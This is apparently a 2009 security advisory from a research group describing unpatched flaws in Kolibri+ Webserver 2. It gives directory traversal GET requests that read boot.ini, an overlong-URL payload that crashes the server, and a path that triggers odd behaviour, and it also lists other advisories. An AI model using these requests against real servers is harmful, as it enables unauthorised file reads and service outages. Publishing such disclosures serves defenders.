/*
 

Vuln: Cherokee Web Server 0.5.4 Denial Of Service [2009-10-25] Details

Vuln: BSR Webweaver Version 1.33 /Scripts access restriction bypass [2009-09-15] Details

Vuln: Kolibri+ Webserver 2 Multiple Vulnerabilities [2009-09-06] Details

Vuln: FUSE BUILDER XSS / HTML Injection [2009-05-16] Details

Vuln: Cisco Subscriber Edge Services Manager Multiple Vulnerabilities [2009-04-08] Details

Vuln: Motorola Wimax Modem multiple vulnerabilities [2009-01-29] Details


Home | Services | Research Projects | Vuln/Exploitation LAB | Knowledge Core | Blog | About | Contact |
Kolibri+ Webserver 2 Multiple Vulnerabilities

Kolibri+ Webserver 2 Multiple Vulnerabilities


[*] Date : 06/09/09

Kolibri+ Webserver 2 Multiple Vulnerabilities namely :

> Directory Traversal
> Denial Of Service / Crash
> Strange Behavior

[*] Download Page : http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation :

[+] Directory Traversal

GET /../../../../../../../../../boot.ini HTTP/1.0

GET /../../../../../../../../boot.ini HTTP/1.0




[+] DOS /CRASH

("A" x 200; #Late crash)
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

("A" x 250 or more then 250 Bytes ; #Immediate Termination of process)
This can also be used ! /default.asp["A" x 250]


[+] Strange Behavior
"/x/_/c:/boot.ini"
Giving the in the url displays "Not Found" msg on the browser & fires off a meesageBox saying that it cannot find the file specified, on the local GUI ! Although the typical 404 not found message for GET /s HTTP/1.1 is "Not found: /s".And nothing fires off a messagebox in the local GUI.


Author : Usman Saeed , Xc0re Security Research Group.
Copyright (c) Xc0re 2007-2009